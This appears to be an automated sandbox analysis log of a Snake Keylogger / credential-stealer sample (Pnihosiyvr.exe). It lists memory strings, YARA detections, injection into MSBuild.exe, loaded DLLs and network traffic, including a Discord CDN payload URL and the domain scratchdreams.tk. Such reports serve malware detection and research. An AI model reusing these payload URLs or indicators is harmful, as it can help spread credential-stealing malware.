Source: Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC01000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D2987F1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC01000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D2987F1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/1223189307423064096/1227506231204253746/Vfjvqmgnpj.mp3?ex=662
Source: Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: MSBuild.exe, 0000000C.00000002.3064626577.0000018357B2A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357B95000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357C03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BA8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357ADC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357B82000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.000001618010A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801C4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.0000016180158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Pnihosiyvr.exe, 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357ADC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.000001618010A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: MSBuild.exe, 0000000D.00000002.3229739212.0000016180158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/156.146.36.197
Source: MSBuild.exe, 0000000C.00000002.3064626577.0000018357ADC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.000001618010A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/156.146.36.197p
Source: Pnihosiyvr.exe, 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2519177655.000002592BEA1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.00000183579D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.0000016180001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC78000.00000004.00000800.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CFB1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D298BD0000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49730 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Pnihosiyvr.exe PID: 6180, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Pnihosiyvr.exe PID: 6180, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: MSBuild.exe PID: 2128, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: MSBuild.exe PID: 2128, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: sssssssssssssssss.exe PID: 6136, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: sssssssssssssssss.exe PID: 6136, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: sssssssssssssssss.exe PID: 2608, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: sssssssssssssssss.exe PID: 2608, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Code function: 0_2_00007FF848F42E70	0_2_00007FF848F42E70
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Code function: 0_2_00007FF848F413A8	0_2_00007FF848F413A8
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Code function: 0_2_00007FF848F475D3	0_2_00007FF848F475D3
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 8_2_00007FF848F213A8	8_2_00007FF848F213A8
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 8_2_00007FF848F22E70	8_2_00007FF848F22E70
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 8_2_00007FF848F275D3	8_2_00007FF848F275D3
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 11_2_00007FF848F113A8	11_2_00007FF848F113A8
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 11_2_00007FF848F12E70	11_2_00007FF848F12E70
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 11_2_00007FF848F175D3	11_2_00007FF848F175D3

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2128 -s 1412

Source: Pnihosiyvr.exe	Static PE information: No import functions for PE file found
Source: sssssssssssssssss.exe.0.dr	Static PE information: No import functions for PE file found

Source: Pnihosiyvr.exe, 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs Pnihosiyvr.exe
Source: Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33CFF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEqknqzt.dll" vs Pnihosiyvr.exe
Source: Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC78000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Pnihosiyvr.exe
Source: Pnihosiyvr.exe, 00000000.00000002.2332223739.000001A345430000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Pnihosiyvr.exe
Source: Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33D6EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEqknqzt.dll" vs Pnihosiyvr.exe
Source: Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Pnihosiyvr.exe
Source: Pnihosiyvr.exe, 00000000.00000002.2333090134.000001A3456F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameEqknqzt.dll" vs Pnihosiyvr.exe
Source: Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Pnihosiyvr.exe
Source: Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs Pnihosiyvr.exe
Source: Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs Pnihosiyvr.exe

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
